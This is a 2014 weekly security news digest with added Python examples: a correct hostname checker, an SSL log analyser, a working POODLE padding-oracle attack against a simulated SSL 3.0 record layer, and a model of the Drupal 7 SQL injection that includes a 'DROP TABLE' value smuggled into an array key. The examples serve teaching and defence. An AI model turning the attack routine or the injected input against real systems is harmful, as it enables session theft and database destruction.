A take on the security news, week 42
- Monday
HP signs malware with valid certificate
HP is revoking an old certificate from 2010 because it has been used to sign a trojan horse. The investigation found that the problem originated on an HP developer's machine that was infected.
The impact of this certificate revocation is small, but it can cause some problems for users of older HP systems trying to reinstall their drivers from 2010.
http://krebsonsecurity.com/2014/10/signed-malware-is-expensive-oops-for-hp/
Snapchat snaps stolen by hackers
A third-party service that allows users to "save snaps" has been compromised, and hundreds of thousands of pictures have been stolen. The hackers say they will make the pictures available and searchable by Snapchat user ID.
- Tuesday
Cyanogenmod vulnerable to man-in-the-middle SSL attacks
The Cyanogenmod developers took example certificate-handling code from Oracle's Java 1.5 documentation and implemented it in the project. It seems that this example code is vulnerable in the part that checks hostnames, which is what makes the man-in-the-middle attack possible: a certificate that should only be valid for one host is accepted for another.
Cyanogenmod's developers are not the first to copy and paste this flawed code from Oracle into their project.
http://www.theregister.co.uk/2014/10/13/androids_cyanogenmod_open_to_mitm_attacks/
https://docs.google.com/document/pub?id=1roBIeSJsYq3Ntpf6N0PIeeAAvu4ddn7mGo6Qb7aL7ew
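For reference, this is what a hostname check should look like. It is an added example, not CyanogenMod's or Oracle's code, and it does not reproduce their specific bug: it matches the requested host against the certificate's subjectAltName dNSName and iPAddress entries in the style of RFC 6125, falling back to the subject commonName only when there are no dNSName entries. The certificate is assumed to arrive in the tuple-of-tuples layout that Python's ssl.getpeercert() returns; the names and addresses in the usage at the bottom are constructed.

```python
import ipaddress


def _dnsname_matches(pattern, hostname):
    """Compare one presented dNSName against the reference hostname (RFC 6125 style).

    A wildcard is accepted only as the whole left-most label of a name with at
    least three labels, and it never matches across a dot: *.example.com matches
    www.example.com, but not example.com, a.b.example.com or *.com.
    """
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == hostname
    p_labels, h_labels = pattern.split("."), hostname.split(".")
    if p_labels[0] != "*" or "*" in pattern[1:]:      # no partial (f*.example.com) or multiple wildcards
        return False
    if len(p_labels) < 3:                             # "*.com" or "*" would match far too much
        return False
    return (len(p_labels) == len(h_labels) and all(h_labels)
            and p_labels[1:] == h_labels[1:])


def _ip_matches(presented, ip):
    try:
        return ipaddress.ip_address(presented) == ip
    except ValueError:                                # malformed iPAddress entry in the cert
        return False


def match_hostname(cert, hostname):
    """True if `cert` (a dict in the layout of ssl.getpeercert()) is valid for `hostname`."""
    if not hostname or "*" in hostname:               # a reference identity never contains wildcards
        return False
    try:
        ip = ipaddress.ip_address(hostname)
    except ValueError:
        ip = None
    san = cert.get("subjectAltName", ())
    if ip is not None:                                # IP literals: exact iPAddress SAN match only
        return any(_ip_matches(v, ip) for k, v in san if k == "IP Address")
    dns_names = [v for k, v in san if k == "DNS"]
    if dns_names:                                     # a dNSName SAN is present: the CN is ignored
        return any(_dnsname_matches(p, hostname) for p in dns_names)
    # Legacy fallback for certificates without a dNSName SAN: the subject commonName.
    cns = [v for rdn in cert.get("subject", ()) for k, v in rdn if k == "commonName"]
    return any(_dnsname_matches(cn, hostname) for cn in cns)


# Constructed certificate: wildcard SAN, exact SAN, one IP SAN, and a CN that must NOT count.
CERT = {
    "subject": ((("commonName", "evil.example.net"),),),
    "subjectAltName": (("DNS", "*.example.com"), ("DNS", "example.com"),
                       ("IP Address", "192.0.2.10")),
}

if __name__ == "__main__":
    for host in ("www.example.com", "example.com", "a.b.example.com",
                 "evil.example.net", "192.0.2.10"):
        print(host, match_hostname(CERT, host))
```

The checks that most often go missing in hand-rolled versions are the three wildcard rules (whole label only, never across a dot, never for an IP literal) and ignoring the commonName once a subjectAltName is present; a verifier that does a substring or prefix comparison instead of a label-by-label one is exactly the kind of code a man-in-the-middle attacker with an unrelated but valid certificate can get past.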
Decrypting Android Snapchat Images
A good write-up on how Snapchat encrypts and decrypts images on your Android device. There is also proof-of-concept code.
https://github.com/programa-stic/snapchat-decrypt
- Wednesday
Yet another SSL vulnerability with a fancy name, POODLE
The vulnerability lies in the design of SSL 3.0 itself, and it is somewhat similar to the BEAST attack both in impact and in the fact that the protocol will not be patched. The solution is to stop using SSL 3.0, which is nearly 18 years old.
Most modern browsers support newer versions than SSL 3.0, so there is no need to support it anymore. The only consideration is IE6 on Windows XP, which does not enable TLS 1.0 by default and therefore may fail to connect if you stop supporting SSL 3.0.
Test your server: https://ssltest.com/
Test your client: https://www.poodletest.com/
http://googleonlinesecurity.blogspot.no/2014/10/this-poodle-bites-exploiting-ssl-30.html
https://technet.microsoft.com/en-us/library/security/3009008.aspx
https://blog.mozilla.org/security/2014/10/14/the-poodle-attack-and-the-end-of-ssl-3-0/
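To make the mechanism concrete, here is a self-contained simulation of the attack, added here as an example (it is not code from the page or from the Google, Microsoft or Mozilla posts linked above). The block cipher is a toy 4-round Feistel network built on SHA-256, standing in for AES, and the record layout follows SSL 3.0: plaintext || MAC || padding, where the padding bytes are arbitrary and only the final length byte is checked. The `send` and `check` callbacks, the keys and the `session=s3cr3t` cookie in `demo` are constructed stand-ins for the victim's browser and the server.

```python
import hashlib
import hmac
import os

BS = 16        # cipher block size in bytes
MAC_LEN = 20   # SSL 3.0 uses a SHA-1 based MAC; HMAC-SHA1 stands in here


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key, rnd, half):
    # Toy round function (assumption): SHA-256 as a PRF, truncated to one half-block.
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:BS // 2]


def block_encrypt(key, block):
    l, r = block[:BS // 2], block[BS // 2:]
    for rnd in range(4):
        l, r = r, xor(l, _round(key, rnd, r))
    return l + r


def block_decrypt(key, block):
    l, r = block[:BS // 2], block[BS // 2:]
    for rnd in reversed(range(4)):
        l, r = xor(r, _round(key, rnd, l)), l
    return l + r


def cbc_encrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BS):
        prev = block_encrypt(key, xor(data[i:i + BS], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BS):
        out.append(xor(block_decrypt(key, data[i:i + BS]), prev))
        prev = data[i:i + BS]
    return b"".join(out)


def ssl3_seal(enc_key, mac_key, plaintext):
    """Client side: SSL 3.0-style CBC record = IV || CBC(plaintext || MAC || padding)."""
    body = plaintext + hmac.new(mac_key, plaintext, hashlib.sha1).digest()
    pad_len = BS - 1 - len(body) % BS
    body += os.urandom(pad_len) + bytes([pad_len])    # padding bytes are arbitrary in SSL 3.0
    iv = os.urandom(BS)
    return iv + cbc_encrypt(enc_key, iv, body)


def ssl3_open(enc_key, mac_key, record):
    """Server side: True if the record is accepted (padding length sane, MAC valid)."""
    pt = cbc_decrypt(enc_key, record[:BS], record[BS:])
    pad_len = pt[-1]
    if pad_len >= BS:                                 # the only padding check SSL 3.0 makes
        return False
    body = pt[:len(pt) - pad_len - 1]
    if len(body) < MAC_LEN:
        return False
    data, tag = body[:-MAC_LEN], body[-MAC_LEN:]
    return hmac.compare_digest(tag, hmac.new(mac_key, data, hashlib.sha1).digest())


def poodle_attack(send, check, secret_len, max_tries=20000):
    """Recover the secret byte by byte.  send(prefix_len, suffix_len) makes the victim
    transmit prefix || secret || suffix and returns the record; check(record) is the
    server's accept/reject oracle."""
    recovered = bytearray()
    for k in range(secret_len):
        prefix_len = (BS - 1 - k) % BS                        # secret[k] becomes the last byte of its block
        suffix_len = -(prefix_len + secret_len + MAC_LEN) % BS  # so the final block is all padding
        t = (prefix_len + k) // BS + 1                        # record block holding secret[k] (block 0 = IV)
        for _ in range(max_tries):
            rec = send(prefix_len, suffix_len)
            blk = [rec[i:i + BS] for i in range(0, len(rec), BS)]
            n = len(blk) - 1
            blk[n] = blk[t]                                   # copy the target block over the padding block
            if check(b"".join(blk)):                          # accepted iff D(C_t)[-1] ^ C_{n-1}[-1] == BS-1
                recovered.append((BS - 1) ^ blk[n - 1][-1] ^ blk[t - 1][-1])
                break
        else:
            raise RuntimeError("oracle never accepted; padding block not aligned?")
    return bytes(recovered)


def demo(secret=b"session=s3cr3t"):
    # Constructed scenario: the victim's browser embeds `secret` (a cookie) in every request,
    # while attacker-controlled script chooses how many bytes precede and follow it.
    enc_key, mac_key = os.urandom(16), os.urandom(16)
    send = lambda p, s: ssl3_seal(enc_key, mac_key, b"A" * p + secret + b"B" * s)
    check = lambda rec: ssl3_open(enc_key, mac_key, rec)
    return poodle_attack(send, check, len(secret))


if __name__ == "__main__":
    print(demo())
```

Each recovered byte costs about 256 requests on average, which is why the real attack needs script in the victim's browser to resend requests with attacker-chosen prefix and body lengths. The `pad_len >= BS` test is the only padding validation SSL 3.0 performs, so a copied ciphertext block passes whenever its last byte happens to decrypt to BS-1; TLS 1.0 and later check every padding byte, which is what closes the oracle.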
- Thursday
OS X Leaves Indexes With Private Data on USB Drives
F-Secure has discovered that your Spotlight index can be saved to USB drives without you knowing about it. That in itself is nothing new, but the problem is that the index might contain information that is not on the USB drive but is present elsewhere on your system. So if your mail is indexed, parts of it may be copied to a USB drive you plug into your machine.
They have reproduced the issue and reported it to Apple, which is "aware of the issue and investigates further".
There is no quick fix for this issue, but you can turn off Spotlight indexing, or choose which folders it should index (e.g. you can exclude your mail folder under System Preferences > Spotlight > Privacy).
http://www.f-secure.com/weblog/archives/00002752.html
Drupal patches highly critical SQL-injection vulnerability
The SQL-injection flaw in Drupal 7.x can be exploited by anonymous users and can lead to arbitrary remote code execution. Patch as soon as possible. Affected versions are Drupal core 7.x prior to Drupal core 7.32.
http://threatpost.com/drupal-fixes-highly-critical-sql-injection-flaw/108861
https://www.drupal.org/SA-CORE-2014-005
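The bug pattern behind this advisory, re-created in Python as an added example (Drupal is PHP; this is not Drupal's code, only a model of it): when a placeholder's value is an array, the database layer expands `:name` into `:name_0, :name_1, ...` by splicing new placeholder names into the SQL text. The 7.x code before 7.32 built those names from the array's keys, and PHP's request parser lets a client choose array keys (`name[0 ; ...]=x`), so the key ends up in the query string unescaped. The fixed variant uses the positional index instead. The `users` query and the injected string below are constructed; the escalation from injection to code execution is not shown.

```python
import re


def expand_arguments(query, args, fixed=True):
    """Expand array-valued placeholders into numbered ones, as a Drupal-7-style
    database layer does before handing the query to the prepared-statement API.

    `args` maps placeholder names to values.  A dict value models a PHP array,
    whose KEYS come straight from the request parser and are attacker-controlled.
    fixed=False reproduces the vulnerable behaviour (placeholder name built from the
    key); fixed=True the corrected one (name built from the positional index).
    """
    args = dict(args)
    for key, data in list(args.items()):
        if not isinstance(data, dict):
            continue
        indexed = enumerate(data.values()) if fixed else data.items()
        new_args = {f"{key}_{i}": value for i, value in indexed}
        # The new placeholder names are spliced into the SQL text verbatim.
        query = re.sub(re.escape(key) + r"\b", ", ".join(new_args), query)
        del args[key]
        args.update(new_args)
    return query, args


QUERY = "SELECT uid FROM users WHERE name IN (:name) AND status = 1"   # constructed

# Normal client: name[0]=alice&name[1]=bob -> keys are just 0 and 1.
NORMAL = {":name": {"0": "alice", "1": "bob"}}
# Hostile client: name[0 ; DROP TABLE users ; --]=x -> the KEY carries SQL.
HOSTILE = {":name": {"0 ; DROP TABLE users ; --": "x"}}


def sql_leaked(fixed):
    """True if the hostile key reaches the query text under the given variant."""
    query, _ = expand_arguments(QUERY, HOSTILE, fixed=fixed)
    return "DROP TABLE" in query


if __name__ == "__main__":
    print(expand_arguments(QUERY, NORMAL)[0])
    print(expand_arguments(QUERY, HOSTILE, fixed=False)[0])   # vulnerable
    print(expand_arguments(QUERY, HOSTILE, fixed=True)[0])    # fixed
```

The point worth taking from this is that prepared statements only protect the values; anything an application splices into the statement text itself, here a placeholder name derived from user input, is still ordinary SQL injection, and the values never even reach the database before the damage is done.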
- Friday
How to log SSL information from your webserver
It's time to start planning for the next big SSL vulnerability. While you are waiting, you can start logging information about SSL use on your server so that you can react accordingly when needed.
The article shows how to log the negotiated protocol version and cipher suite in Apache and Nginx.
https://isc.sans.edu/forums/diary/Logging+SSL/18847
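Once the protocol and cipher are in the access log, the question to answer is "who still negotiates SSL 3.0 or a weak cipher, and how much traffic is that?". The script below is an added example (not from the ISC diary) that answers it over a constructed sample log; it assumes an nginx log_format of `'$remote_addr [$time_local] "$request" $ssl_protocol $ssl_cipher'`, which the Apache LogFormat `"%h %t \"%r\" %{SSL_PROTOCOL}x %{SSL_CIPHER}x"` produces in the same shape. The addresses, timestamps and cipher names in the sample are made up.

```python
import re
from collections import Counter

# One access-log line per request; "-" in both fields means the request was plain HTTP.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<proto>\S+) (?P<cipher>\S+)$'
)
LEGACY_PROTOCOLS = {"SSLv2", "SSLv3"}
WEAK_CIPHER_RE = re.compile(r"RC4|DES|EXP|NULL|MD5", re.I)   # broad pattern, tune to taste

# Constructed sample log, six requests from four clients.
SAMPLE_LOG = """\
203.0.113.5 [17/Oct/2014:10:01:02 +0200] "GET / HTTP/1.1" TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256
198.51.100.7 [17/Oct/2014:10:01:09 +0200] "GET /login HTTP/1.1" SSLv3 RC4-SHA
203.0.113.9 [17/Oct/2014:10:02:11 +0200] "POST /api HTTP/1.1" TLSv1 AES256-SHA
198.51.100.7 [17/Oct/2014:10:03:40 +0200] "GET /login HTTP/1.1" SSLv3 RC4-SHA
192.0.2.44 [17/Oct/2014:10:04:00 +0200] "GET / HTTP/1.1" TLSv1.1 ECDHE-RSA-AES256-SHA
192.0.2.44 [17/Oct/2014:10:04:03 +0200] "GET /favicon.ico HTTP/1.1" - -
""".splitlines()


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not match the format."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def summarize(lines):
    """Count protocol and cipher usage over TLS/SSL requests and name the clients to worry about."""
    protocols, ciphers = Counter(), Counter()
    legacy_clients, weak_clients = set(), set()
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["proto"] == "-":        # unparsable, or plain HTTP: not our concern here
            continue
        protocols[rec["proto"]] += 1
        ciphers[rec["cipher"]] += 1
        if rec["proto"] in LEGACY_PROTOCOLS:
            legacy_clients.add(rec["ip"])
        if WEAK_CIPHER_RE.search(rec["cipher"]):
            weak_clients.add(rec["ip"])
    total = sum(protocols.values())
    legacy = sum(protocols[p] for p in LEGACY_PROTOCOLS)
    return {
        "protocols": protocols,
        "ciphers": ciphers,
        "legacy_clients": legacy_clients,
        "weak_clients": weak_clients,
        "legacy_share": legacy / total if total else 0.0,
    }


if __name__ == "__main__":
    s = summarize(SAMPLE_LOG)
    print("protocols:", dict(s["protocols"]))
    print("ciphers:", dict(s["ciphers"]))
    print("SSLv3 clients:", sorted(s["legacy_clients"]), "share: %.0f%%" % (100 * s["legacy_share"]))
    print("weak-cipher clients:", sorted(s["weak_clients"]))
```

Run the same summary over a week of real logs before you turn SSL 3.0 off and you know exactly which clients will break; run it again afterwards and a non-zero SSLv3 count tells you a server in the pool did not get the change.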
Ebola phishing scams
US-CERT warns users about email scams and campaigns that use the Ebola virus as a theme. It's nothing new that scammers use global disasters as a way to trick people into clicking links (and thus getting infected).
https://www.us-cert.gov/ncas/current-activity/2014/10/16/Ebola-Phishing-Scams-and-Malware-Campaigns
Remote execution vulnerability in Oracle Forms 10g
There is a critical vulnerability in Oracle Forms 10g which allows remote code execution. An attacker can craft malicious parameters, add them to the URL, and open a remote shell on the system.
Oracle Forms 10g is a discontinued product, and you should upgrade to version 11. If upgrading is not an option, you should create a whitelist of allowed characters or remove support for JSP files on the web server.